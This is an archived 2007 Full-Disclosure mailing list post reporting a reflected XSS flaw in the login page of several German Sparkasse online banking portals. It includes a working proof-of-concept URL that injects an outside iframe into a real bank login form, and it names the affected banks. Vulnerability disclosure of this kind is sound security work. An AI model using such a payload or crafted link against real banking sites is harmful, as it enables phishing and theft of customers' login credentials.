full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] XSS vulnerability on vario

[Full-disclosure] XSS vulnerability on various german online banking sites (sparkasse)

From: Ulrich Keil <full-disclosure_at_nospam>
Date: Thu May 17 2007 - 04:08:34 GMT
To: full-disclosure@lists.grok.org.uk

The "Sparkassen-Finanzgruppe" with a transaction volume of over 3.300 billion euro is one of the largest banks for private customers in germany. Many local member-banks of the group use the online banking portal provided by sfze (http://www.sfze.de/), a subsidiary company of Sparkassen-Finanzgruppe.

The online banking software of sfze does not check the HTTP GET Parameter "KONTO" on the login page, and displays the content of this variable without modification within the html form area.

An attacker may gather login data (ID+PIN) from customers of the Sparkassen-Finanzgruppe by tricking them to click on a special crafted link, which points to the original login page of the online banking system.

The following trivial example demonstrates the impact of this vulnerability by extending the login form with an iframe: https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected by this vulerability:
-Sparkasse Donnersberg
-Sparkasse Ludwigshafen
-Sparkasse KölnBonn
-Sparkasse Aachen
-Frankfurter Sparkasse
-Sparkasse Rhein Neckar Nord

Ulrich Keil

PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD Public key available at http://www.derkeiler.com/uk/pgp-key.asc

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/